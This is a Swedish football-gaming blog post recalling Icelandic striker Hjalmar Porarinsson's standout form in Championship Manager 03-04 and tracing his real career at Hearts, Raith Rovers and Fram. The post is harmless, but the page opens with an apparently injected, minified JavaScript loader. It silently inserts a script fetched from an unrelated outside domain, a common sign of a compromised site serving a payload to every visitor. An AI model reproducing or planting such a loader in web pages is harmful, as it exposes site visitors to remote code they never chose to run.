;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Lirare vi minns: Hjalmar Porarinsson (Thorarinsson) – FMSweden
Meny Stäng

Lirare vi minns: Hjalmar Porarinsson (Thorarinsson)

På måndagar kommer jag att sjösätta följetongen “Lirare vi minns” där jag kommer uppmärksamma spelare som en gång i tiden var spännande talanger och blivande storstjärnor i den magiska världen Championship Manager eller Football Manager. Jag kommer berätta mina eller andras minnen av spelarna och sedan göra en sammanfattning om vart karriären tog vägen.

Jag tog ett ärevarv runt i mitt sovrum men fick tassa försiktigt på tå och mima mitt tysta jubel för att inte väcka mina föräldrar. Som 13-åring hade jag just besegrat Manchester United i kvartsfinal i Champions League med lilla Laholm och den isländska storstjärnan Hjalmar Porarinsson (Thorarinsson) hade gjort ett hattrick. Islänningen hade värvats in redan första säsongen när jag spelade i division 2 och fullständigt spottat in mål, säsong efter säsong, tills han nu på egen hand körde över Manchester United i Champions League.

Spelet var det nästan mytomspunna CM 03-04 och den 17-årige Hjalmar Porarinsson var en av många spännande spelare med skyhög potential som man kunde värva billigt. Det speciella med just Porarinsson var att det inte var några som helst problem att lyckas värva honom till ett svenskt division 1 eller division 2 lag från hans isländska klubb Prottur och gjorde man det så hade man målgaranti varje säsong.

Hur gick det då i verkligheten? Porarinsson sågs som en stor talang där han spottade in mål för de isländska ungdomslandslagen (12 mål på 17 matcher för U17 landslaget). Efter att ha gjort 2 mål på 13 matcher som nybliven 17 åring i isländska högstaligan så lämnade Hjalmar Porarinsson sitt Prottur 2004 för skotska Hearts och fick även i den vevan debutera för isländska U21-landslaget. Som bara 18-åring gjorde han mål för Hearts i ligacupens semifinal och då såg det ut som att den unge islänningen kanske skulle få ut den potentialen som hade utlovats i CM 03-04. Men efter det tog det stopp. Hearts plockade in Champions League-vinnaren Jankauskas och Roman Bednar, båda från FBK Kaunas och det betydde att Porarinsson fick nöja sig med att spela i reservlaget och sedan lånas ut till Raith Rovers en säsong innan han återvände till Island och huvudstadslaget Fram. Han tillbringade fyra säsonger i Fram och gjorde 28 mål på 100 matcher men där tog berättelsen till synes slut för Hjampar Porarinsson. Efter att ha grävt runt ordentligt på google så verkar det som att islänningen avslutade sin karriär 2011, bara 26 år gammal. Varför han sluta eller vad han gör idag vet jag inte, men jag hoppas att den personen som digitalt förde mitt Laholm till en semifinal i Champions League lever ett lyckligt liv.

Please wait...

Liknande Inlägg

6 kommentarer

Lämna ett svar